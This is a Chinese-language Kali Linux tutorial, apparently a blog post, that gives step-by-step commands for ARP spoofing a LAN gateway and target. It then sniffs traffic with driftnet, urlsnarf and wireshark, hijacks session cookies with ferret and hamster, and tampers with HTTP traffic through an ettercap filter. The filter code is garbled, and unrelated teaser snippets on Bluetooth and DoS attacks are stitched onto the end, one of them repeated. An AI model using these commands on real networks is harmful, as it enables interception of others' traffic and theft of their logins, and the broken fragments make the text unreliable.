arpspoof是一款arp欺騙攻擊工具
檢視物理機ip位址,將kali的ip位址設定為和物理機同一網段。
虛擬機器網路介面卡設定為橋接模式(複製物理網路連線狀態)
虛擬網路編輯器在管理員模式下啟動後,設定vmnet0為橋接模式,外部鏈結選擇物理機網絡卡。
開啟埠**:echo 1 > /proc/sys/net/ipv4/ip_forward
主機探測:
windows工具:advanced ip scanner
kali命令:fping -g 192.168.0.1/24
開啟arp欺騙
arpspoof -i eth0 -t 192.168.0.1 192.168.0.10
前者為閘道器或路由器,後者為嗅探目標
只支援http,https不行
driftnet -i eth0
開始嗅探
urlsnarf -i eth0
開啟wareshark抓包
wireshark
過一段時間後停止抓包,儲存檔案,另存為pcap格式
ferret -r 1.pcap
hamster
架設**伺服器
開啟瀏覽器,**127.0.0.1:1234
訪問127.0.0.1:1234
獲得cookie資訊
kali啟動apache:
service apache2 start
ip位址為192.168.188.63
主目錄:/var/www/html/
將放入主目錄下,命名為test.jpg
建立filter檔案:
vim /filter
新增:if (ip.proto == tcp && tcp.dst == 80)
}if (ip.proto == tcp && tcp.src == 80)
轉換為二進位制檔案:
etterfilter /filter -o /filter.ef
攻擊:
ettercap -t -q -f /filter.ef -m arp /目標ip///
kali連線藍芽 藍芽攻擊指南(kali)
基本操作 hciconfig 檢視藍芽裝置資訊 hcitool 這是乙個查詢工具。可以用來查詢裝置名稱,裝置id,裝置類別和裝置時鐘。hcidump 可以使用這個來嗅探藍芽通訊 hciconfig hci0 up 啟動藍芽裝置 hciconfig hci0 down 關閉藍芽裝置 service b...
kali連線藍芽 藍芽攻擊指南(kali)
基本操作 hciconfig 檢視藍芽裝置資訊 hcitool 這是乙個查詢工具。可以用來查詢裝置名稱,裝置id,裝置類別和裝置時鐘。hcidump 可以使用這個來嗅探藍芽通訊 hciconfig hci0 up 啟動藍芽裝置 hciconfig hci0 down 關閉藍芽裝置 service b...
kali中怎麼dos攻擊
在計算機行業,拒絕服務 dos 或分布式拒絕服務 ddos 攻擊是指不法分子企圖讓某機器或網路資源無法被預期的使用者所使用。雖然執行dos攻擊的方式 動機和目標不一樣,但通常包括設法臨時性或無限期中斷或暫停連線至網際網路的主機提供服務。攻擊過程 1.你使用hping3執行拒絕服務攻擊 即dos 2....